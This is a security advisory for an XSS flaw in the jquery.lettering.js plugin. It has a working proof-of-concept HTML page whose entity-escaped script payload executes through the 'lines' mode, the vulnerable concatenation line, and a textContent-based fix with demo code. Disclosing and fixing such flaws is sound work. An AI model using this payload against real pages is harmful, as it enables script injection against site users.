The injector first reads the element's text content, in which the browser has already decoded any HTML entities, and then concatenates that text straight into an HTML string (Lettering.js/jquery.lettering.js, line 20 in d06bb73):
inject += '<span class="'+klass+(i+1)+'" aria-hidden="true">'+item+'</span>'+after;
Thus even when the server has properly escaped user input, calling lettering on those DOM nodes reads the escaped content back as plain text (entities decoded) and re-inserts it as HTML, undoing the escaping and allowing cross-site scripting (XSS).
This is probably only exploitable through the "lines" and "words" methods. The default method splits the text into single characters, so a < from the payload is emitted on its own as <span><</span>, where it is followed by another < rather than a tag name, and browsers parse such a < as text.
Solution
Create each <span> programmatically using document.createElement and set its content using textContent, so the text is stored as a text node and is never parsed as HTML.
Exploit
<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme">&lt;script&gt;alert("I'm properly escaped HTML");&lt;/script&gt;</div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>
A popup showing "I'm properly escaped HTML" will open, so arbitrary JavaScript execution in the page is achieved even though the markup was correctly escaped. Tested in Firefox 75.0 and Chromium 81.0.4044.113.
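The behaviour described above (the injector's string concatenation, why the character mode does not reintroduce tags while "lines" and "words" do, and the createElement/textContent fix), as an added example that is not Lettering.js code. The names decodeEntities, vulnerableInject, payloadTagsIn, safeInject and demo, and the SERVER_ESCAPED sample markup, are this example's own; the sample is constructed, and "lines" is modelled here simply as a split on newlines.

```javascript
// Added example, not Lettering.js code. Names below are this example's own.

// The plugin reads the element's text with entities decoded, so a
// server-escaped "&lt;script&gt;" comes back as a literal "<script>".
// Minimal decoder covering the entities an HTML escaper normally emits.
function decodeEntities(escaped) {
  return escaped
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&amp;/g, '&'); // last, so "&amp;lt;" decodes to "&lt;", not "<"
}

// The vulnerable concatenation from jquery.lettering.js as a pure function:
// decoded text in, HTML string out. The plugin hands this string to jQuery's
// .append(), which parses it as markup and runs any <script> it contains.
function vulnerableInject(text, splitter, klass, after) {
  let inject = '';
  text.split(splitter).forEach((item, i) => {
    inject += '<span class="' + klass + (i + 1) + '" aria-hidden="true">' + item + '</span>' + after;
  });
  return inject;
}

// Which tags in the generated HTML come from the payload rather than from the
// plugin's own <span> wrappers? An HTML tokenizer only opens a tag when "<" is
// followed by an ASCII letter (or "/" and a letter for an end tag); any other
// "<" is emitted as text. That is why the character mode is safe: every
// payload "<" is immediately followed by "</span>".
function payloadTagsIn(html) {
  const tags = [];
  const re = /<(\/?)([A-Za-z][A-Za-z0-9]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    const name = m[1] + m[2].toLowerCase();
    if (name !== 'span' && name !== '/span') tags.push(name);
  }
  return tags;
}

// Constructed sample: the markup a server that escapes user input would emit.
const SERVER_ESCAPED = '&lt;script&gt;alert("I\'m properly escaped HTML");&lt;/script&gt;';

// Run the three split modes over the decoded text and report which of them
// reintroduce payload tags. The words mode reintroduces the tags as well;
// whether the resulting script body is still valid JavaScript then depends on
// where the payload's spaces fall.
function demo() {
  const text = decodeEntities(SERVER_ESCAPED);
  return {
    lines: payloadTagsIn(vulnerableInject(text, '\n', 'line', '')),
    words: payloadTagsIn(vulnerableInject(text, ' ', 'word', ' ')),
    chars: payloadTagsIn(vulnerableInject(text, '', 'char', '')),
  };
}

// The fix: build each <span> with DOM APIs and assign the piece through
// textContent, so it is stored as a text node and never reparsed as markup.
// `doc` is injectable only so the function can be driven outside a browser.
function safeInject(target, splitter, klass, after, doc = document) {
  const text = target.textContent;
  const nodes = [];
  text.split(splitter).forEach((item, i) => {
    const span = doc.createElement('span');
    span.className = klass + (i + 1);
    span.setAttribute('aria-hidden', 'true');
    span.textContent = item; // text, never markup
    nodes.push(span);
    if (after) nodes.push(doc.createTextNode(after));
  });
  target.setAttribute('aria-label', text);
  target.replaceChildren(...nodes);
  return nodes;
}
```

In a browser, safeInject(document.getElementById('exploitme'), ' ', 'word', ' ') produces the same span structure as the plugin's words mode without the reparse; demo() shows the lines and words modes emitting real script and /script tags from the escaped sample while the character mode emits none.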